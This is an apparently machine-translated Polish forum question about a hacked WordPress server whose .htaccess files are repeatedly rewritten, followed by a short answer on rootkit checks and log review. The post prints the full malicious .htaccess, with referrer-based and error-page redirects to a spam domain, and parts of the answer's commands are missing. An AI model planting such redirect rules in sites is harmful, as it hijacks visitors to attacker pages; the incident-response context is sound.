Złośliwy skrypt modyfikuje pliki .htaccess na serwerze
Możliwy duplikat:
Mój serwer został zhakowany w CRASH
https://serverfault.com/questi ... yWygląda na to, że istnieje złośliwy skrypt, który uzyskuje dostęp do mojego serwera i edytuje pliki .htaccess dla wszystkich moich hostowanych witryn w celu przekierowania do odsyłaczy spamujących.
Jak najlepiej tego uniknąć?
Zmieniłem szczegóły dostępu do serwera, zarówno dla panelu sterowania, jak i dostępu do FTP, i próbowałem zaktualizować istniejące pliki .htaccess następującym kodem, ale nadal się zmienia.
# BEGIN WordPressRewriteEngine On
RewriteBase/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ./index.php [L]# END WordPress# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files># Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files># protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
Co jeszcze mogłoby pomóc?
Przepraszam za brak informacji, jestem nowy na serwerach i tak dalej, więc jeśli potrzebne są dalsze informacje, po prostu krzycz!
Z góry dziękuję za pomoc.
Dan
******* EDYTOWAĆ *******
Złośliwy .htaccess na żądanie
<IfModule mod_rewrite.c><Files ~ "^.*\.([Hh][Tt][Aa])">
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url] [R=301,L]
</IfModule> # STRONG HTACCESS PROTECTION
order allow,deny
deny from all
satisfy all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 http://byidelement.ru/ruby/index.php
ErrorDocument 401 http://byidelement.ru/ruby/index.php
ErrorDocument 403 http://byidelement.ru/ruby/index.php
ErrorDocument 404 http://byidelement.ru/ruby/index.php
ErrorDocument 500 http://byidelement.ru/ruby/index.php [/code]
Nie znaleziono powiązanych wyników
Zaproszony:
Aby odpowiedzieć na pytania, Zaloguj się lub Zarejestruj się
1 odpowiedzi
Anonimowy użytkownik
Potwierdzenie od:
chkrootkit
http://www.chkrootkit.org/
wkrótce, na wszelki wypadek.
Upewnij się, że wszystkie pakiety są aktualne i zawierają poprawki zabezpieczeń:
Jest bardzo prawdopodobne, że jest to znany exploit w wersji Wordpressa (lub innym gotowym środowisku), z którego korzystasz, i obecnie jest wielokrotnie używany zdalnie. Jeśli tak, znajdź najnowszą wersję wszystkich używanych frameworków i sprawdź poprawki bezpieczeństwa.
Zakładając, że jest obsługiwany zdalnie, można to potwierdzić, otrzymując
działa na serwerze internetowym, uzyskuje dostęp do dzienników i śledzi wszelkie podejrzane działania.
będzie poleceniem w standardowej instalacji Ubuntu, ale wszystkie dystrybucje umieszczają swoje dzienniki Apache w różnych lokalizacjach. Kiedy zobaczysz coś podejrzanego, będziesz wiedział, który VirtualHost został zhakowany. Jeśli masz ochotę na przygodę, sprawdź również swoje historyczne dzienniki dostępu. Może się to wydawać trudnym zadaniem na serwerze o dużym ruchu, ale pokaże punkt ataku. Zawęź wyszukiwanie, rozpoczynając je mniej więcej w momencie, gdy wiesz, że nastąpił pierwszy atak.